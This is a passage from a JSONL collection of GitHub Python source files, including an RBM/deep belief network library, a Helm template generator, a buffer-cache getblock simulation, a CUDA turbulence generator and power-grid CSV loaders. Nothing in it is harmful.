\"__main__\":\n\tsayHey().run()\n","repo_name":"roxy22r/SayHelloApp_Kivy","sub_path":"sayHey.py","file_name":"sayHey.py","file_ext":"py","file_size_in_byte":1115,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"73897101867","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom abc import ABCMeta, abstractmethod\n\nimport numpy as np\nfrom scipy.stats import truncnorm\nfrom sklearn.base import BaseEstimator, TransformerMixin, ClassifierMixin, RegressorMixin\n\nfrom dbn.activations import SigmoidActivationFunction, ReLUActivationFunction\nfrom dbn.utils import batch_generator\nimport time\n\n\nclass BaseModel(object):\n def save(self, save_path):\n import pickle\n\n with open(save_path, 'wb') as fp:\n pickle.dump(self, fp)\n\n @classmethod\n def load(cls, load_path):\n import pickle\n\n with open(load_path, 'rb') as fp:\n return pickle.load(fp)\n\n\nclass BinaryRBM(BaseEstimator, TransformerMixin, BaseModel):\n\n def __init__(self,\n n_hidden_units=100,\n activation_function='sigmoid',\n optimization_algorithm='sgd',\n learning_rate=1e-3,\n n_epochs=10,\n contrastive_divergence_iter=1,\n batch_size=32,\n verbose=True):\n self.n_hidden_units = n_hidden_units\n self.activation_function = activation_function\n self.optimization_algorithm = optimization_algorithm\n self.learning_rate = learning_rate\n self.n_epochs = n_epochs\n self.contrastive_divergence_iter = contrastive_divergence_iter\n self.batch_size = batch_size\n self.verbose = verbose\n # self.W_list = list()\n\n def fit(self, X):\n self.n_visible_units = X.shape[1]\n if self.activation_function == 'sigmoid':\n self.W = np.random.randn(self.n_hidden_units, self.n_visible_units) / np.sqrt(self.n_visible_units)\n self.c = np.random.randn(self.n_hidden_units) / np.sqrt(self.n_visible_units)\n self.b = np.random.randn(self.n_visible_units) / np.sqrt(self.n_visible_units)\n self._activation_function_class = SigmoidActivationFunction\n elif self.activation_function == 'relu':\n self.W = truncnorm.rvs(-0.2, 0.2, size=[self.n_hidden_units, self.n_visible_units]) / np.sqrt(\n self.n_visible_units)\n self.c = np.full(self.n_hidden_units, 0.1) / np.sqrt(self.n_visible_units)\n self.b = np.full(self.n_visible_units, 0.1) / np.sqrt(self.n_visible_units)\n self._activation_function_class = ReLUActivationFunction\n else:\n raise ValueError(\"Invalid activation function.\")\n\n if self.optimization_algorithm == 'sgd':\n self._stochastic_gradient_descent(X)\n else:\n raise ValueError(\"Invalid activation function.\")\n return self\n\n def transform(self, X):\n if len(X.shape) == 1:\n return self._compute_hidden_units(X)\n transformed_data = self._compute_hidden_units_matrix(X)\n return transformed_data\n\n def _reconstruct(self, transformed_data):\n return self._compute_visible_units_matrix(transformed_data)\n\n def _stochastic_gradient_descent(self, _data):\n accum_delta_W = np.zeros(self.W.shape)\n accum_delta_b = np.zeros(self.b.shape)\n accum_delta_c = np.zeros(self.c.shape)\n for iteration in range(1, self.n_epochs + 1):\n idx = np.random.permutation(len(_data))\n data = _data[idx]\n for batch in batch_generator(self.batch_size, data):\n accum_delta_W[:] = .0\n accum_delta_b[:] = .0\n accum_delta_c[:] = .0\n for sample in batch:\n delta_W, delta_b, delta_c = self._contrastive_divergence(sample)\n accum_delta_W += delta_W\n accum_delta_b += delta_b\n accum_delta_c += delta_c\n self.W += self.learning_rate * (accum_delta_W / self.batch_size)\n self.b += self.learning_rate * (accum_delta_b / self.batch_size)\n self.c += self.learning_rate * (accum_delta_c / self.batch_size)\n if self.verbose:\n error = self._compute_reconstruction_error(data)\n print(\">> Epoch %d finished \\tRBM Reconstruction error %f , %s\" %\n (iteration, error, time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time()))))\n\n def _contrastive_divergence(self, vector_visible_units):\n \"\"\"\n 使用对比散度法计算梯度\n :param vector_visible_units: \n :return: \n \"\"\"\n v_0 = vector_visible_units\n v_t = np.array(v_0)\n\n for t in range(self.contrastive_divergence_iter):\n h_t = self._sample_hidden_units(v_t)\n v_t = self._compute_visible_units(h_t)\n\n v_k = v_t\n h_0 = self._compute_hidden_units(v_0)\n h_k = self._compute_hidden_units(v_k)\n delta_W = np.outer(h_0, v_0) - np.outer(h_k, v_k)\n delta_b = v_0 - v_k\n delta_c = h_0 - h_k\n\n return delta_W, delta_b, delta_c\n\n def _sample_hidden_units(self, vector_visible_units):\n hidden_units = self._compute_hidden_units(vector_visible_units)\n return (np.random.random_sample(len(hidden_units)) < hidden_units).astype(np.int64)\n\n def _sample_visible_units(self, vector_hidden_units):\n visible_units = self._compute_visible_units(vector_hidden_units)\n return (np.random.random_sample(len(visible_units)) < visible_units).astype(np.int64)\n\n def _compute_hidden_units(self, vector_visible_units):\n v = np.expand_dims(vector_visible_units, 0)\n return np.squeeze(self._compute_hidden_units_matrix(v))\n\n def _compute_hidden_units_matrix(self, matrix_visible_units):\n return np.transpose(self._activation_function_class.function(\n np.dot(self.W, np.transpose(matrix_visible_units)) + self.c[:, np.newaxis]))\n\n def _compute_visible_units(self, vector_hidden_units):\n h = np.expand_dims(vector_hidden_units, 0)\n return np.squeeze(self._compute_visible_units_matrix(h))\n\n def _compute_visible_units_matrix(self, matrix_hidden_units):\n return self._activation_function_class.function(np.dot(matrix_hidden_units, self.W) + self.b[np.newaxis, :])\n\n def _compute_free_energy(self, vector_visible_units):\n v = vector_visible_units\n return - np.dot(self.b, v) - np.sum(np.log(1 + np.exp(np.dot(self.W, v) + self.c)))\n\n def _compute_reconstruction_error(self, data):\n data_transformed = self.transform(data)\n data_reconstructed = self._reconstruct(data_transformed)\n return np.mean(np.sum((data_reconstructed - data) ** 2, 1))\n\n\nclass UnsupervisedDBN(BaseEstimator, TransformerMixin, BaseModel):\n def __init__(self,\n hidden_layers_structure=[100, 100],\n activation_function='sigmoid',\n optimization_algorithm='sgd',\n learning_rate_rbm=1e-3,\n n_epochs_rbm=10,\n contrastive_divergence_iter=1,\n batch_size=32,\n verbose=True):\n self.hidden_layers_structure = hidden_layers_structure\n self.activation_function = activation_function\n self.optimization_algorithm = optimization_algorithm\n self.learning_rate_rbm = learning_rate_rbm\n self.n_epochs_rbm = n_epochs_rbm\n self.contrastive_divergence_iter = contrastive_divergence_iter\n self.batch_size = batch_size\n self.rbm_layers = None\n self.verbose = verbose\n self.rbm_class = BinaryRBM\n\n def fit(self, X, y = None):\n self.rbm_layers = list()\n for n_hidden_units in self.hidden_layers_structure:\n rbm = self.rbm_class(n_hidden_units=n_hidden_units,\n activation_function=self.activation_function,\n optimization_algorithm=self.optimization_algorithm,\n learning_rate=self.learning_rate_rbm,\n n_epochs=self.n_epochs_rbm,\n contrastive_divergence_iter=self.contrastive_divergence_iter,\n batch_size=self.batch_size,\n verbose=self.verbose)\n self.rbm_layers.append(rbm)\n\n if self.verbose:\n print(\"[START] Pre-training step:\")\n input_data = X\n for rbm in self.rbm_layers:\n rbm.fit(input_data)\n input_data = rbm.transform(input_data)\n if self.verbose:\n print(\"[END] Pre-training step\")\n return self\n\n def transform(self, X):\n input_data = X\n for rbm in self.rbm_layers:\n input_data = rbm.transform(input_data)\n return input_data\n\n\nclass AbstractSupervisedDBN(BaseEstimator, BaseModel):\n __metaclass__ = ABCMeta\n\n def __init__(self, unsupervised_dbn_class,\n hidden_layers_structure=[100, 100],\n activation_function='sigmoid',\n optimization_algorithm='sgd',\n learning_rate=1e-3,\n learning_rate_rbm=1e-3,\n n_iter_backprop=100,\n l2_regularization=1.0,\n n_epochs_rbm=10,\n contrastive_divergence_iter=1,\n batch_size=32,\n dropout_p=0, # float between 0 and 1. Fraction of the input units to drop\n verbose=True):\n self.unsupervised_dbn = unsupervised_dbn_class(hidden_layers_structure=hidden_layers_structure,\n activation_function=activation_function,\n optimization_algorithm=optimization_algorithm,\n learning_rate_rbm=learning_rate_rbm,\n n_epochs_rbm=n_epochs_rbm,\n contrastive_divergence_iter=contrastive_divergence_iter,\n batch_size=batch_size,\n verbose=verbose)\n self.unsupervised_dbn_class = unsupervised_dbn_class\n self.n_iter_backprop = n_iter_backprop\n self.l2_regularization = l2_regularization\n self.learning_rate = learning_rate\n self.batch_size = batch_size\n self.dropout_p = dropout_p\n self.p = 1 - self.dropout_p\n self.verbose = verbose\n\n def fit(self, X, y=None, pre_train= True):\n if pre_train:\n self.pre_train(X)\n self._fine_tuning(X, y)\n return self\n\n def predict(self, X):\n if len(X.shape) == 1:\n X = np.expand_dims(X, 0)\n transformed_data = self.transform(X)\n predicted_data = self._compute_output_units_matrix(transformed_data)\n return predicted_data\n\n def pre_train(self, X):\n self.unsupervised_dbn.fit(X)\n return self\n\n def transform(self, *args):\n return self.unsupervised_dbn.transform(*args)\n\n @abstractmethod\n def _transform_labels_to_network_format(self, labels):\n return\n\n @abstractmethod\n def _compute_output_units_matrix(self, matrix_visible_units):\n return\n\n @abstractmethod\n def _determine_num_output_neurons(self, labels):\n return\n\n @abstractmethod\n def _stochastic_gradient_descent(self, data, labels):\n return\n\n @abstractmethod\n def _fine_tuning(self, data, _labels):\n return\n\n","repo_name":"ZhaiNY2014/d-s","sub_path":"dbn/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":11477,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"72187307947","text":"import os\nimport sys\nimport subprocess\nimport yaml\nimport argparse\n\nMANIFESTS_PATH = \"Manifests\"\nINBOUND_HELM_TEMPLATE_PATH = \"Applications/cni-inbound\"\nOUTBOUND_HELM_TEMPLATE_PATH = \"Applications/cni-outbound\"\nMANIFESTS_INPUT_DIRS = [\"Dev\", \"Prod\"]\nHELM_TEMPLATE_OUTPUT_PATH = os.path.join(MANIFESTS_PATH, \"Output\")\n\n\nclass ManifestProcessor:\n def __init__(self, manifest_path=\"\"):\n if manifest_path == \"\":\n self.manifest_path = MANIFESTS_PATH\n else:\n self.manifest_path = manifest_path\n return\n\n def form_eks_cluster_name(self, env_name, region_name, deployment_id, direction):\n return \"{}-{}-{}-{}-data-plane\".format(env_name, region_name, deployment_id, direction)\n\n def create_output_template_dirs(self, eks_cluster_name):\n\n # Create Output Directory for HELM Templates\n path = os.path.join(HELM_TEMPLATE_OUTPUT_PATH, eks_cluster_name)\n try:\n os.makedirs(path, exist_ok=True)\n except OSError as e:\n print(\"Creation of the template directory %s failed\" % path)\n raise e\n\n def generate_inbound_helm_template(self, manifest_data, manifest_file, cluster_name_suffix):\n # Inbound Dataplane Template\n inbound_eks_cluster_name = self.form_eks_cluster_name(\n manifest_data[\"env_name\"], manifest_data[\"region\"], manifest_data[\"deployment_id\"], cluster_name_suffix\n )\n self.create_output_template_dirs(inbound_eks_cluster_name)\n response = subprocess.run(\n [\n \"helm\",\n \"template\",\n manifest_data[\"deployment_id\"],\n INBOUND_HELM_TEMPLATE_PATH,\n \"--values\",\n manifest_file,\n \"--output-dir\",\n os.path.join(HELM_TEMPLATE_OUTPUT_PATH, inbound_eks_cluster_name),\n ]\n )\n if response.returncode != 0:\n print(response)\n sys.exit(\"Helm template generation failed\")\n\n def generate_outbound_helm_template(self, manifest_data, manifest_file, cluster_name_suffix):\n outbound_eks_cluster_name = self.form_eks_cluster_name(\n manifest_data[\"env_name\"], manifest_data[\"region\"], manifest_data[\"deployment_id\"], cluster_name_suffix\n )\n self.create_output_template_dirs(outbound_eks_cluster_name)\n response = subprocess.run(\n [\n \"helm\",\n \"template\",\n manifest_data[\"deployment_id\"],\n OUTBOUND_HELM_TEMPLATE_PATH,\n \"--values\",\n manifest_file,\n \"--output-dir\",\n os.path.join(HELM_TEMPLATE_OUTPUT_PATH, outbound_eks_cluster_name),\n ]\n )\n if response.returncode != 0:\n print(response)\n sys.exit(\"Helm template generation failed\")\n\n def generate_helm_template(self, manifest_data, manifest_file):\n # Inbound Dataplane Template\n self.generate_inbound_helm_template(manifest_data, manifest_file, \"inbound\")\n\n # Outbound Dataplane Template\n if \"outbound_vpcs_config\" in manifest_data:\n outbound_vpc_cfg = manifest_data[\"outbound_vpcs_config\"]\n for vpc_suffix in outbound_vpc_cfg.keys():\n self.generate_outbound_helm_template(manifest_data, manifest_file, \"outbound-\" + str(vpc_suffix))\n else:\n self.generate_outbound_helm_template(manifest_data, manifest_file, \"outbound\")\n\n def process_manifest_file(self, manifest_file):\n with open(manifest_file, \"r\") as file:\n manifest_data = yaml.load(file, Loader=yaml.FullLoader)\n print(\"***Generating Helm Templates for manifest: \", manifest_file)\n self.generate_helm_template(manifest_data, manifest_file)\n\n def fetch_manifest_files_list(self, manifests_dir_path):\n manifest_file_list = []\n for dirname in MANIFESTS_INPUT_DIRS:\n for root, dir_names, file_names in os.walk(os.path.join(manifests_dir_path, dirname)):\n for file_name in file_names:\n if file_name.lower().endswith(\".yaml\"):\n manifest_file_list.append(os.path.join(root, file_name))\n return manifest_file_list\n\n def process(self):\n self.process_manifest_file(self.manifest_path)\n\ndef get_fixed_arguments(args):\n \"\"\"\n return the fixed arguments as a dictionary\n :param args:\n :return:\n \"\"\"\n return vars(args)\n\ndef main():\n parser = argparse.ArgumentParser(\n description=\"This program generates EKS Helm Templates for manifests.\"\n )\n parser.add_argument(\"--manifest_path\", help=\"path to the manifest file describing the deployment\")\n args = parser.parse_args()\n deploy_args = get_fixed_arguments(args)\n\n manifests = ManifestProcessor(deploy_args[\"manifest_path\"])\n manifests.process()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"agajjala/cni-deployer","sub_path":"src/helm_template_generator.py","file_name":"helm_template_generator.py","file_ext":"py","file_size_in_byte":4938,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"14416100870","text":"\nimport math, random\nimport numpy as np\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nsns.set_theme()\n\nimport pandas as pd\nfrom Controllers.DataScienceManager import DataScienceManager as dsm\n\n#Instantiate Controllers\nuse_full_dataset = True\nuse_database = False\n\ncluster_cut_off = 0.9\n\ndata_sci_mgr = dsm.DataScienceManager(\n use_full_dataset=use_full_dataset, \n use_database=use_database\n)\n\n\"\"\"filename = 'Analysis/Multivariate/11042023_c_rc2/multivar_qc_fs_bs_candidate_features_11042023.csv' \nphenos_subset = pd.read_csv(filename, index_col=0)\nindeces = phenos_subset.values[:,1:3].sum(axis=1)\nindeces = np.where(indeces >= 1)\ncandidates = pd.Series(phenos_subset.iloc[indeces]['label'].values, name='phenotype_id')\"\"\"\n\nphenos_subset = ['P4:3799', 'MFI:469', 'P5 gd:1759', 'P1:7363', 'P2:8981', 'P2:8332', 'P7 Mono:3409', 'P2:19526']\ncandidates = pd.Series(phenos_subset, name='phenotype_id')\n\nif cluster_cut_off == 0.95:\n filename = 'Data/phenos_corr_dict_0.95_05042023.parquet'\nelif cluster_cut_off == 0.9:\n filename = 'Data/phenos_corr_dict_0.9_06042023.parquet'\nelif cluster_cut_off == 0.7:\n filename = 'Data/phenos_corr_dict_0.7_06042023.parquet'\ncorrelates = pd.read_parquet(filename)\n\npheno_ref_data = data_sci_mgr.sql.read_table_into_data_frame(schema_name='KIR_HLA_STUDY', table_name='immunophenotype_definitions')\nols_stats = data_sci_mgr.sql.read_table_into_data_frame(schema_name='KIR_HLA_STUDY', table_name='model_result_ols')\npheno_data_stats = data_sci_mgr.sql.read_table_into_data_frame(schema_name='KIR_HLA_STUDY', table_name='immunophenotype_summary_stats')\n\ncandidates = pheno_ref_data.merge(candidates, how='right', left_on='phenotype_id', right_on='phenotype_id')\ncandidates = candidates.merge(ols_stats, how='left', left_on='phenotype_id', right_on='feature_name')\ncandidates = candidates.merge(pheno_data_stats, how='left', left_on='phenotype_id', right_on='measurement_id')\ncandidates = candidates.merge(correlates, how='left', left_on='phenotype_id', right_on='label')\n\ndate_str = data_sci_mgr.data_mgr.get_date_str()\nfilename = 'Analysis/RandomForest/candidate_summary_stats_{}.csv'.format(date_str)\ncandidates.to_csv(filename)\n\n","repo_name":"ChrisMBrooks/KIR_HLA","sub_path":"Scripts/General/enirch_candidates.py","file_name":"enirch_candidates.py","file_ext":"py","file_size_in_byte":2182,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22149961159","text":"import multiprocessing #threading interface\nimport time #sleep()\nimport os\nimport signal\nimport multiprocessing\nimport Header\n\n\ndef _writeAsynchronously(lock,queues,blockNumber):\n\n print(\"************ Asynchronous Writing of Block number-\",blockNumber,\" ***************\")\n time.sleep(8) #sleep for 4 seconds to simulate writing to disk\n \n queues.clearDelayedWriteBit(blockNumber)\n\n print(\"************ Asynchronous Writing of Block Number-\",blockNumber,\" Completed ***************\")\n \n #adding buffer to head of free list, to follow the LRU algorithm\n lock.acquire()\n queues.addToflFirst(blockNumber)\n lock.release()\n\n\ndef asynchronousWrite(lock,queues,blockNumber):\n writingProcess=multiprocessing.Process(target=_writeAsynchronously,args=(lock,queues,blockNumber,))\n writingProcess.start()\n \n return 1\n\n\n# These functions are called by the target environment when the corresponding signal occurs.\n# The target environment suspends execution of the program until the signal catcher returns.\n\n# This function generates signal for processes waiting for a particular buffer\ndef sigint_catcher(sig,frame):\n print(\"process: \",os.getpid(),\" woke up as it was sleeping for a particular buffer\" )\n\n#It generates the signal for processes waiting for any buffer\ndef sighup_catcher(sig,frame):\n print(\"process: \",os.getpid(),\" woke up as it was sleeping for a any buffer\" )\n\n# Used only in case of 'Delayed write' case. This allows asynchronous write on the disk.\n\n#sleep function to make a process sleep for a particular buffer\ndef mySleepForBuffer(sleepQueue,buffer):\n signal.signal(signal.SIGINT,sigint_catcher)\n sleepQueue.add(buffer,os.getpid())\n signal.pause()#process will sleep till SIGINT signal is raised\n \n\n#sleep function to make a process sleep for any buffer\ndef mySleepForAnyBuffer(sleepQueue):\n signal.signal(signal.SIGHUP,sighup_catcher)\n sleepQueue.add(-1,os.getpid()) #as processes waiting for any buffer state -1 as required buffer number\n signal.pause()#process will sleep till SIGHUP signal is raised\n \n\n\ndef getBlock(sleepQueue,blockNumber,lock,queues):\n bufferFound=False\n while (not bufferFound):\n\n lock.acquire() #lock\n\n #The buffer is in the hashQ \n if (queues.isPresentInHashQ(blockNumber)):\n #5 The Buffer is found in the hashQ, but its buffer currently busy. So, the process going to sleep\n if(queues.isLocked(blockNumber)):\n print(\"Process \",os.getpid(),\" is going to sleep as buffer \",blockNumber,\" is present in hashQ and is busy\")\n #releasing the Upper acquired lock and continue for next process\n lock.release() #5 release\n mySleepForBuffer(sleepQueue,blockNumber)\n continue\n \n #1. Reqiured buffer is in the hash queue and Free\n queues.setLockedBit(blockNumber)\n queues.removeFromfl(blockNumber)\n\n #Return the buffer to the requesting process\n print(\"Process \",os.getpid(),\" will get buffer \",blockNumber,\" from hashQ\")\n bufferFound=True\n lock.release() #1 release\n return blockNumber\n\n #Buffer is not in the hashQ. Hence, check freelist for the buffer \n else:\n #4. freelist is empty i.e there is no buffer to use. So, process going to sleep.\n if (queues.isEmptyfl()):\n print(\"Process \",os.getpid(),\" is going to sleep as freelists is empty\")\n\n lock.release() #4 release\n mySleepForAnyBuffer(sleepQueue) \n continue\n\n #2. freelist is not empty and just getting the first free buffer available\n blockNumber_fl=queues.getAnyFromfl()\n\n #3. Check if the buffer is marked as 'delayed write'\n if(queues.isDelayedWrite(blockNumber_fl)):\n\n #Now removing it from free list\n queues.removeFromfl(blockNumber_fl)\n print(\"freelist after removing \",blockNumber_fl)\n queues.printfl()\n #For revealing the scenario under which process is going to do asynchronous write\n print(\"Process \",os.getpid(),\" came across free buffer \",blockNumber_fl, \" but marked as delayed write so is executing asynchronous write\")\n \n lock.release() #3 release\n asynchronousWrite(lock,queues,blockNumber_fl)\n continue\n\n #Found a free buffer in the freelist \n queues.removeFromHashQ(blockNumber_fl)\n\n print(\"Replace buffer \",blockNumber_fl,\" in freelist, with buffer \",blockNumber)\n\n\n print(\"Buffer \",blockNumber_fl,\" is removed from free list\")\n print(\"Buffer \",blockNumber,\" added to the hash queue\")\n #replacing the old block number(returnrd from the freelist ) with the new block number\n queues.setBlockNumber(blockNumber_fl,blockNumber)\n \n\n #Add buffer to the new hash queue\n queues.addBlockToHashQ(blockNumber)\n\n #remove it from the free list\n queues.removeFromfl(blockNumber) \n\n #Update status of the buffer\n queues.setLockedBit(blockNumber)\n queues.clearValidBit(blockNumber)\n\n\n bufferFound=True\n lock.release() #2 release\n return blockNumber\n\n","repo_name":"rohitshakya/Get_Block_Implementation","sub_path":"GetBlock.py","file_name":"GetBlock.py","file_ext":"py","file_size_in_byte":5426,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"72383690988","text":"import math\nfrom numba import cuda\nimport numpy as np\nfrom numpy import pi, ones, zeros, sin, cos, sqrt, arange\n\n\n@cuda.jit\ndef turbo_kernel(kx, ky, kz, xc, yc, zc, psi, um, sxm, sym, szm, dx, dy, dz, u_, v_, w_):\n \"\"\"\n This is the cuda kernel for the turbulence generator. Our approach is to assign one thread per spatial grid point.\n Then, the job of each thread is to compute the Fourier summation @ that grid point.\n :param kx: Fourier modes in the x direction\n :param ky: Fourier modes in the y direction\n :param kz: Fourier modes in the z direction\n :param xc: x coordinate of cell centers\n :param yc: y coordinate of cell centers\n :param zc: z coordinate of cell centers\n :param psi: Wave component\n :param um: Fourier velocity magnitude\n :param sxm: Auxiliary vector (sigma in the paper)\n :param sym: Auxiliary vector (sigma in the paper)\n :param szm: Auxiliary vector (sigma in the paper)\n :param dx: Grid spacing in the x direction\n :param dy: Grid spacing in the y direction\n :param dz: Grid spacing in the z direction\n :param u_: x velocity component of the generated turbulence\n :param v_: y velocity component of the generated turbulence\n :param w_: z velocity component of the generated turbulence\n :return: u, v, w of the generated turbulent vector field\n \"\"\"\n # calculate thread location for 3D array\n i, j, k = cuda.grid(3)\n\n # Each thread is assigned to a physical grid point. Each thread will compute the Fourier series @ that point\n if i < u_.shape[0] and j < v_.shape[1] and k < w_.shape[2]:\n for m in range(0, len(kx)):\n arg = kx[m] * xc[i] + ky[m] * yc[j] + kz[m] * zc[k] - psi[m]\n bmx = 2.0 * um[m] * math.cos(arg - kx[m] * dx / 2.0)\n bmy = 2.0 * um[m] * math.cos(arg - ky[m] * dy / 2.0)\n bmz = 2.0 * um[m] * math.cos(arg - kz[m] * dz / 2.0)\n u_[i, j, k] += bmx * sxm[m]\n v_[i, j, k] += bmy * sym[m]\n w_[i, j, k] += bmz * szm[m]\n\n\ndef generate_isotropic_turbulence(lx, ly, lz, nx, ny, nz, nmodes, wn1, especf):\n \"\"\"\n Given an energy spectrum, this function computes a discrete, staggered, three\n dimensional velocity field in a box whose energy spectrum corresponds to the input energy\n spectrum up to the Nyquist limit dictated by the grid\n\n This function returns u, v, w as the axial, transverse, and azimuthal velocities.\n\n Parameters:\n -----------\n lx: float\n The domain size in the x-direction.\n ly: float\n The domain size in the y-direction.\n lz: float\n The domain size in the z-direction.\n nx: integer\n The number of grid points in the x-direction.\n ny: integer\n The number of grid points in the y-direction.\n nz: integer\n The number of grid points in the z-direction.\n wn1: float\n Smallest wavenumber. Typically dictated by spectrum or domain size.\n espec: functor\n A callback function representing the energy spectrum.\n \"\"\"\n\n # generate cell centered x-grid\n dx = lx / nx\n dy = ly / ny\n dz = lz / nz\n\n # compute random angles\n np.random.seed(7)\n phi = 2.0 * pi * np.random.uniform(0.0, 1.0, nmodes)\n nu = np.random.uniform(0.0, 1.0, nmodes)\n theta = np.arccos(2.0 * nu - 1.0)\n psi = np.random.uniform(-pi / 2.0, pi / 2.0, nmodes)\n\n # highest wave number that can be represented on this grid (nyquist limit)\n wnn = max(np.pi / dx, max(np.pi / dy, np.pi / dz))\n print('I will generate data up to wave number: ', wnn)\n\n # wavenumber step\n dk = (wnn - wn1) / nmodes\n\n # wavenumber at cell centers\n wn = wn1 + 0.5 * dk + arange(0, nmodes) * dk\n\n dkn = ones(nmodes) * dk\n\n # wavenumber vector from random angles\n kx = sin(theta) * cos(phi) * wn\n ky = sin(theta) * sin(phi) * wn\n kz = cos(theta) * wn\n\n # create divergence vector\n ktx = np.sin(kx * dx / 2.0) / dx\n kty = np.sin(ky * dy / 2.0) / dy\n ktz = np.sin(kz * dz / 2.0) / dz\n\n # Enforce Mass Conservation\n phi1 = 2.0 * pi * np.random.uniform(0.0, 1.0, nmodes)\n nu1 = np.random.uniform(0.0, 1.0, nmodes)\n theta1 = np.arccos(2.0 * nu1 - 1.0)\n zetax = sin(theta1) * cos(phi1)\n zetay = sin(theta1) * sin(phi1)\n zetaz = cos(theta1)\n sxm = zetay * ktz - zetaz * kty\n sym = -(zetax * ktz - zetaz * ktx)\n szm = zetax * kty - zetay * ktx\n smag = sqrt(sxm * sxm + sym * sym + szm * szm)\n sxm = sxm / smag\n sym = sym / smag\n szm = szm / smag\n\n # verify that the wave vector and sigma are perpendicular\n kk = np.sum(ktx * sxm + kty * sym + ktz * szm)\n print('Orthogonality of k and sigma (divergence in wave space):')\n print(kk)\n\n # get the modes\n km = wn\n\n espec = especf(km)\n espec = espec.clip(0.0)\n\n # generate turbulence at cell centers\n um = sqrt(espec * dkn)\n u_ = zeros([nx, ny, nz])\n v_ = zeros([nx, ny, nz])\n w_ = zeros([nx, ny, nz])\n\n xc = dx / 2.0 + arange(0, nx) * dx\n yc = dy / 2.0 + arange(0, ny) * dy\n zc = dz / 2.0 + arange(0, nz) * dz\n\n # allocate memory on the device for u_, v_, w_ solutions\n # cuda_u = cuda.to_device(u_)\n # cuda_v = cuda.to_device(v_)\n # cuda_w = cuda.to_device(w_)\n\n # determine the threads per block and number of blocks\n threads_per_block = (8, 8, 8)\n bpg_x = int(math.ceil(u_.shape[0] / threads_per_block[0])) # blocks per grid in the x direction\n bpg_y = int(math.ceil(u_.shape[1] / threads_per_block[1]))\n bpg_z = int(math.ceil(u_.shape[2] / threads_per_block[2]))\n blocks_per_grid = (bpg_x, bpg_y, bpg_z)\n\n # run the kernel\n turbo_kernel[blocks_per_grid, threads_per_block](kx, ky, kz, xc, yc, zc, psi, um, sxm, sym, szm, dx, dy,\n dz, u_, v_, w_)\n return u_, v_, w_\n","repo_name":"saadgroup/TurboGenPY","sub_path":"cudaturbo.py","file_name":"cudaturbo.py","file_ext":"py","file_size_in_byte":5801,"program_lang":"python","lang":"en","doc_type":"code","stars":35,"dataset":"github-code","pt":"37"} +{"seq_id":"32455168304","text":"import pandas as pd\nfrom Safe_Cascade.classes.power import *\nfrom Safe_Cascade.util.class_function import update_dataclass\n\ndef get_bus(bus_list: List, bus_num: int):\n _bus_dict = {_.bus_num:_ for _ in bus_list}\n return _bus_dict[bus_num]\n\ndef get_sub(sub_list: List, sub_name: int):\n _sub_dict = {_.name:_ for _ in sub_list}\n return _sub_dict[sub_name]\n\ndef get_substations(url):\n substations_df = pd.read_csv(url)\n substations = substations_df.apply(lambda x: SubStation(name=x['SubName'],\n location=Point(x['Longitude'], x['Latitude']),\n subid=x['SubID']), axis=1).to_list()\n return substations\n\n\ndef get_buses(url):\n buses_df = pd.read_csv(url)\n buses = buses_df.apply(lambda x: Bus(name=x['BusName'],\n bus_num=x['BusNum'],\n voltage=x['BusNomVolt'],\n substation=x['BusName'][:-len(str(x['BusNomVolt']))]), axis=1).to_list()\n\n return buses\n\n\ndef get_transformers(url, buses_list):\n transformers_df = pd.read_csv(url)\n transformers = transformers_df.apply(lambda row: Transformer(\n name=\"{}-{}-txfmr\".format(row['BusNum'], row['BusNum:1']),\n bus1name=get_bus(buses_list, row['BusNum']).name,\n bus2name=get_bus(buses_list, row['BusNum:1']).name,\n substation=get_bus(buses_list, row['BusNum:1']).substation,\n r=row['LineR:1'],\n x=row['LineX:1'],\n s_nom=row['XFMVABase']), axis=1).to_list()\n return transformers\n\n\ndef update_names(data_list):\n #transformers and transmission lines need this step\n transformers_name = {}\n for _ in data_list:\n _name = _.name\n if _name in transformers_name:\n transformers_name[_name] = transformers_name[_name] + 1\n else:\n transformers_name[_name] = 1\n update_dataclass(_, name=f'{_name}-{transformers_name[_name]}')\n\n\ndef get_transmissionlines(url, buses, substations):\n lines_df = pd.read_csv(url)\n lines = lines_df.apply(lambda row: Line(name=\"Line-{}-{}\".format(row['BusNum'], row['BusNum:1']),\n bus1name=get_bus(buses, row['BusNum']).name,\n bus2name=get_bus(buses, row['BusNum:1']).name,\n sub_1=get_sub(substations, get_bus(buses, row['BusNum']).substation).name,\n sub_2=get_sub(substations, get_bus(buses, row['BusNum:1']).substation).name,\n r=row['LineR'],\n x=row['LineX'],\n mva_limit=row['LineAMVA'],\n voltage=get_bus(buses, row['BusNum']).voltage,\n location=LineString([get_sub(substations, get_bus(buses, row[\n 'BusNum']).substation).location,\n get_sub(substations, get_bus(buses, row[\n 'BusNum:1']).substation).location])),\n axis=1).to_list()\n return lines\n\n\ndef get_generators(url, buses):\n gen_df = pd.read_csv(url)\n generators = gen_df.apply(lambda x: Generator(name=f\"{str(x['BusNum'])}-{str(x['GenID'])}\",\n bus_num=x['BusNum'],\n bus_name=get_bus(buses, x['BusNum']).name,\n gen_id=x['GenID'],\n v_pu=x['GenVoltSet'],\n p_set=x['GenMWSetPoint'],\n status=x['GenStatus']), axis=1).to_list()\n return generators\n\n\ndef get_loads(url, buses):\n loads_df = pd.read_csv(url)\n loads = loads_df.apply(lambda x: Load(name=\"{}-Load\".format(x['BusNum']),\n p=x['LoadSMW'],\n q=x['LoadSMVR'],\n substation=get_bus(buses, x['BusNum']).substation,\n bus_name=get_bus(buses, x['BusNum']).name), axis=1).to_list()\n return loads\n\n\n\n","repo_name":"ruilee16/safe_cascade","sub_path":"Safe_Cascade/util/get_power_components.py","file_name":"get_power_components.py","file_ext":"py","file_size_in_byte":4513,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} 